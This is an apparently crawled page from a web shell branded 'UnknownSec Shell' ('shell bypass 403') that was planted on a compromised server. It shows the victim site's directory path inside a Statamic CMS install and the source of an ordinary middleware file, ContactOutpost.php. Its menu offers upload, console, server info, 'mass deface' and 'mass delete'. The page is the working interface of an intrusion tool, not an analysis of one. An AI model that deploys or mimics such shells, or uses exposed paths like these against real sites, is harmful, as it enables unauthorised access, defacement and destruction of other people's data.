shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
Middleware
/
CP
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ContactOutpost.php
<?php namespace Statamic\Http\Middleware\CP; use Closure; use Statamic\Licensing\Outpost; class ContactOutpost { protected $outpost; public function __construct(Outpost $outpost) { $this->outpost = $outpost; } public function handle($request, Closure $next) { $this->outpost->radio(); return $next($request); } }
© 2026 UnknownSec